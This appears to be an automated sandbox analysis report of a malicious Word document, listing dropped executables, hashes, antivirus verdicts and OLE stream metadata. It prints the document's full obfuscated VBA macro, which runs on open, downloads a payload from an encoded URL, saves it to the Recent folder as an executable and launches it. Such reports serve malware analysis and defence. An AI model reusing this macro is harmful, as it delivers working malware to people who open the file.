                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):169984
                                  Entropy (8bit):7.755998218282918
                                  Encrypted:false
                                  SSDEEP:3072:XdkwdXAqPEHTJJuVqhHjFV2xEEbh9pKP2qYCp65nTGsAeXy0fkd:XmwBAQeVmWHHePH02qYCp6NGsAeXy9d
                                  MD5:F44302503EA4EEDFA831C25711DF51B7
                                  SHA1:127D6EC83904DE48D90C293E53C905FC4206BFB8
                                  SHA-256:21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
                                  SHA-512:71E9512244D864B53ABF436B496A53E6771135CC7D5FC0E4DF7D04AC23074B6ED1E7438A28BC232A70F57DE97367F0E3A21925BED738C5E47BDF3487AB2F4E03
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 47%
                                  Joe Sandbox View:
                                  • Filename: gjot5vxpIC.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rg................................. ........@.. ....................................`.................................X...S.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........G...V...........................................................N5.WSS...Yf...W.k....R.qpP.....g.,R.........;I) ...`.5.8S...hP.B._I...'...&.^...M.*.kA}........'..9.....Y!>"....o.4!....0......]u...G.#].1.Y.\.N..\.N.m...|t.y.........*..._......7..T&.x......9...oZ..q.^.%...AE.}..$...T...?-....`........".K.5........')...k.DW.q....-r._D.....9.=..&."....'.L'..j.\...MO.c.;.9..|......+H0!...H ...Q....=C.)..n.d....~....6......\.H...I!...5.3..5b..R
                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):169984
                                  Entropy (8bit):7.755998218282918
                                  Encrypted:false
                                  SSDEEP:3072:XdkwdXAqPEHTJJuVqhHjFV2xEEbh9pKP2qYCp65nTGsAeXy0fkd:XmwBAQeVmWHHePH02qYCp6NGsAeXy9d
                                  MD5:F44302503EA4EEDFA831C25711DF51B7
                                  SHA1:127D6EC83904DE48D90C293E53C905FC4206BFB8
                                  SHA-256:21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
                                  SHA-512:71E9512244D864B53ABF436B496A53E6771135CC7D5FC0E4DF7D04AC23074B6ED1E7438A28BC232A70F57DE97367F0E3A21925BED738C5E47BDF3487AB2F4E03
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 47%
                                  Joe Sandbox View:
                                  • Filename: gjot5vxpIC.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rg................................. ........@.. ....................................`.................................X...S.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........G...V...........................................................N5.WSS...Yf...W.k....R.qpP.....g.,R.........;I) ...`.5.8S...hP.B._I...'...&.^...M.*.kA}........'..9.....Y!>"....o.4!....0......]u...G.#].1.Y.\.N..\.N.m...|t.y.........*..._......7..T&.x......9...oZ..q.^.%...AE.}..$...T...?-....`........".K.5........')...k.DW.q....-r._D.....9.=..&."....'.L'..j.\...MO.c.;.9..|......+H0!...H ...Q....=C.)..n.d....~....6......\.H...I!...5.3..5b..R
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Fri Dec 6 10:13:00 2024, Last Saved Time/Date: Fri Dec 6 09:30:00 2024, Number of Pages: 1, Number of Words: 2, Number of Characters: 16, Security: 0
                                  Category:dropped
                                  Size (bytes):51200
                                  Entropy (8bit):5.126263399348965
                                  Encrypted:false
                                  SSDEEP:384:YbfFAhRp/6j1dhUsQGlWmxDJzkpiSY5UL4bLxEt6/5RrzyjkjvhEGzpgh60jAx:wKhHi3KnCWmHzk7gXRlFEOp3
                                  MD5:2858F7DFA6B6B41F350A1F4FCF020333
                                  SHA1:99839B2A1A9706079D44D9405D7CB2F1111A2EDF
                                  SHA-256:CD97D9112D21255A5DE8BA3F7DD0628CF0728C656169468794CF6A919645D112
                                  SHA-512:57C7A4A776D64705FA7CCD1A105DAF2BA3E037C84B351B5903E989F6AB0871FE152034AA0B2A01586250FDA572EEABE58FE4E3E17DAE8EB27141E4F512ABD69C
                                  Malicious:true
                                  Preview:......................>.......................7...........:...............6......................................................................................................................................................................................................................................................................................................................................................................................................................................................y.............................bjbj...............................{...{....................................................................................6.......6...........................................................................................................-...f...................................................................'...................................................$...........E...>.........................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):162
                                  Entropy (8bit):2.4797606462020307
                                  Encrypted:false
                                  SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                  MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                  SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                  SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                  SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                  Malicious:false
                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Fri Dec 6 10:13:00 2024, Last Saved Time/Date: Fri Dec 6 09:30:00 2024, Number of Pages: 1, Number of Words: 2, Number of Characters: 16, Security: 0
                                  Category:dropped
                                  Size (bytes):51200
                                  Entropy (8bit):5.126263399348965
                                  Encrypted:false
                                  SSDEEP:384:YbfFAhRp/6j1dhUsQGlWmxDJzkpiSY5UL4bLxEt6/5RrzyjkjvhEGzpgh60jAx:wKhHi3KnCWmHzk7gXRlFEOp3
                                  MD5:2858F7DFA6B6B41F350A1F4FCF020333
                                  SHA1:99839B2A1A9706079D44D9405D7CB2F1111A2EDF
                                  SHA-256:CD97D9112D21255A5DE8BA3F7DD0628CF0728C656169468794CF6A919645D112
                                  SHA-512:57C7A4A776D64705FA7CCD1A105DAF2BA3E037C84B351B5903E989F6AB0871FE152034AA0B2A01586250FDA572EEABE58FE4E3E17DAE8EB27141E4F512ABD69C
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:......................>.......................7...........:...............6......................................................................................................................................................................................................................................................................................................................................................................................................................................................y.............................bjbj...............................{...{....................................................................................6.......6...........................................................................................................-...f...................................................................'...................................................$...........E...>.........................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal.dotm, Last Saved By: oplup, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Fri Dec 6 05:13:00 2024, Last Saved Time/Date: Fri Dec 6 05:14:00 2024, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                  Entropy (8bit):4.964054445036645
                                  TrID:
                                  • Microsoft Word document (32009/1) 54.23%
                                  • Microsoft Word document (old ver.) (19008/1) 32.20%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                  File name:yIla7SeJ6r.doc
                                  File size:48'128 bytes
                                  MD5:26973056c194b68b10d1c2b9a632a27e
                                  SHA1:0b61132df948c4d48e81b631bdad91be1080f530
                                  SHA256:4a58b228b23cdc286d103115b2fb312eedf6741aeada17b242620b6737db1035
                                  SHA512:72a2120c4e62e91aec8cf5ec14ca42d5088944b4652dd5c69be15640bb3c260a8eb74984659f98d2161671bc4b4da0397542d4e0d24e30518374ff686ed66c2e
                                  SSDEEP:384:5fFAhRp/6j1dhUsQGlWmxDJzkpiSY5UyCUuCJbnsQfzyK9tujq/z60jAx7:5KhHi3KnCWmHzk7o3JzVip
                                  TLSH:99232A01B1D2C617F2A545B45ECBCBEA7739BC19AD06424B32E4BF0EBD396B0CA15744
                                  File Content Preview:........................>.......................7...........:...............6..................................................................................................................................................................................
                                  Icon Hash:2764a3aaaeb7bdbf
                                  Document Type:OLE
                                  Number of OLE Files:1
                                  Has Summary Info:
                                  Application Name:Microsoft Office Word
                                  Encrypted Document:False
                                  Contains Word Document Stream:True
                                  Contains Workbook/Book Stream:False
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:False
                                  Flash Objects Count:0
                                  Contains VBA Macros:True
                                  Code Page:1252
                                  Author:admin
                                  Template:Normal.dotm
                                  Last Saved By:oplup
                                  Revion Number:4
                                  Total Edit Time:60
                                  Create Time:2024-12-06 05:13:00
                                  Last Saved Time:2024-12-06 05:14:00
                                  Number of Pages:1
                                  Number of Words:0
                                  Number of Characters:1
                                  Creating Application:Microsoft Office Word
                                  Security:0
                                  Document Code Page:1252
                                  Number of Lines:1
                                  Number of Paragraphs:1
                                  Thumbnail Scaling Desired:False
                                  Company:
                                  Contains Dirty Links:False
                                  Shared Document:False
                                  Changed Hyperlinks:False
                                  Application Version:917504
                                  General
                                  Stream Path:Macros/VBA/NewMacros
                                  VBA File Name:NewMacros.bas
                                  Stream Size:918
                                  Data ASCII:. . . . . . . . \\ . . . . . . . . . c . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . .
                                  Data Raw:01 16 01 00 00 f0 00 00 00 5c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 63 02 00 00 43 03 00 00 00 00 00 00 01 00 00 00 1c b7 b6 f8 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Attribute VB_Name = "NewMacros"
                                  Sub doc()
                                  '
                                  ' doc Macro
                                  '
                                  '
                                  
                                  End Sub
                                  

                                  General
                                  Stream Path:Macros/VBA/ThisDocument
                                  VBA File Name:ThisDocument.cls
                                  Stream Size:8816
                                  Data ASCII:. . . . . . . . f . . . . . . . . . m . . . . . . . . . . . . . . . O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i .
                                  Data Raw:01 16 01 00 01 f0 00 00 00 66 0b 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 6d 0b 00 00 e9 17 00 00 00 00 00 00 01 00 00 00 1c b7 4f ca 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Attribute VB_Name = "ThisDocument"
                                  Attribute VB_Base = "1Normal.ThisDocument"
                                  Attribute VB_GlobalNameSpace = False
                                  Attribute VB_Creatable = False
                                  Attribute VB_PredeclaredId = True
                                  Attribute VB_Exposed = True
                                  Attribute VB_TemplateDerived = True
                                  Attribute VB_Customizable = True
                                  Function YOnvdf() As Byte
                                  YOnvdf = 0
                                  Call Eeotq
                                  End Function
                                  Function Eeotq() As Currency
                                  Eeotq = 1000000000#
                                  Call ycgftitiou
                                  End Function
                                  
                                      Public Function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI)
                                          QoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                                          cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYD = " @#$%^&*()_+|01456789bdghjklmqvwz.,-~AFGHJKMNQRTVWXZ?!23acefinoprstuxyBCDEILOPSUY"
                                          For w = 1 To Len(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI)
                                              ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv = InStr(QoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr, Mid(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI, w, 1))
                                              If ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv > 0 Then
                                                  bWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFU = Mid(cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYD, ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv, 1)
                                                  NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu + bWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFU
                                              Else
                                                  NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu + Mid(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI, w, 1)
                                              End If
                                          Next
                                          pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu
                                      End Function
                                  Private Sub Document_Open()
                                  Dim WshShell As Object
                                  Dim JbiIUBSpecialPathTycyt As String
                                  Dim kxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBw As Integer
                                  kxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBw = Chr(50) + Chr(48) + Chr(48)
                                    
                                      
                                  
                                      Set WshShell = CreateObject("WScript.Shell")
                                      JbiIUBSpecialPathTycyt = WshShell.SpecialFolders("Recent")
                                  Dim TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr
                                  Dim nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf
                                  Dim dEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGvb
                                  Dim zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT
                                  Dim xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg
                                  Dim WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf As Integer
                                  Dim lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ
                                  Dim cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHP
                                  WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf = 1
                                  
                                  ECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYCh = "Please wait....."
                                  Selection.TypeText (ECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYCh)
                                  
                                  
                                  Set lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ = CreateObject("microsoft.xmlhttp")
                                  Set xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg = CreateObject("Shell.Application")
                                  
                                  zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT = JbiIUBSpecialPathTycyt + pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("\MF.")
                                  lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.Open "get", pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("h://www.m.m/dhw/zgdggwwgggg/dghghwhghgh/bhdh."), False
                                  lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.send
                                  nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf = lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.responseBody
                                  If lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.Status = 200 Then
                                  Set TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr = CreateObject("adodb.stream")
                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Open
                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Type = WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf
                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Write nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf
                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.SaveToFile zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT, WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf + WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf
                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Close
                                  End If
                                  xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg.Open (zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT)
                                  End Sub
                                  
                                  
                                  Function ycgftitiou() As Double
                                  Call rgdxheg
                                  End Function
                                  Function rgdxheg() As Integer
                                  rgdxheg = 42
                                  Call uvgyjbdeh
                                  End Function
                                  Function uvgyjbdeh() As Long
                                  uvgyjbdeh = uvgyjbdeh
                                  Call Qiotbdok
                                  End Function
                                  
                                  Function Qiotbdok() As Single
                                  Qiotbdok = Qiotbdok
                                  Call bdekviniot
                                  End Function
                                  Function bdekviniot() As Date
                                  
                                  End Function
                                  
                                  Function Vionot() As Currency
                                  Call tiuoty
                                  End Function
                                  Function tiuoty() As Boolean
                                  tiuoty = False
                                  Call Obvitiobb
                                  End Function
                                  
                                  Function Obvitiobb() As Single
                                  Call tbjhjzg
                                  End Function
                                  
                                  
                                  Function tbjhjzg() As Boolean
                                  tbjhjzg = True
                                  Call Yimomnh
                                  End Function
                                  
                                  Function Yimomnh() As Double
                                  Yimomnh = nifnfzsg
                                  Call nifnfzsg
                                  End Function
                                  
                                  
                                  Function nifnfzsg() As Date
                                  nifnfzsg = nil
                                  Call quibvjhv
                                  End Function
                                  
                                  Function quibvjhv()
                                  
                                  End Function
                                  
                                  
                                  Function MBFJbdjkbc() As Date
                                  MBFJbdjkbc = 11 / 5 / 2024
                                  End Function
                                  Function RTgdJbdjkbc() As Single
                                  End Function
                                  
                                  

                                  General
                                  Stream Path:\x1CompObj
                                  CLSID:
                                  File Type:data
                                  Stream Size:114
                                  Entropy:4.235956365095031
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x5DocumentSummaryInformation
                                  CLSID:
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.24406295845382758
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                                  Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                  General
                                  Stream Path:\x5SummaryInformation
                                  CLSID:
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.40764166636467514
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a d m i n . . . . . . . . . . . N o r m a l . d o t m . . . . . . . . . o p l u p . . . . . . . . . . . 4 . . . . . . . . . . . M i c r o s o f t O f f i c e W o r d . . . @ . . . . F # . . . . @
                                  Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 1c 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 04 00 00 00 78 00 00 00 07 00 00 00 88 00 00 00 08 00 00 00 9c 00 00 00 09 00 00 00 ac 00 00 00 12 00 00 00 b8 00 00 00 0a 00 00 00 d8 00 00 00 0c 00 00 00 e4 00 00 00 0d 00 00 00 f0 00 00 00
                                  General
                                  Stream Path:1Table
                                  CLSID:
                                  File Type:data
                                  Stream Size:6783
                                  Entropy:5.980355683716292
                                  Base64 Encoded:True
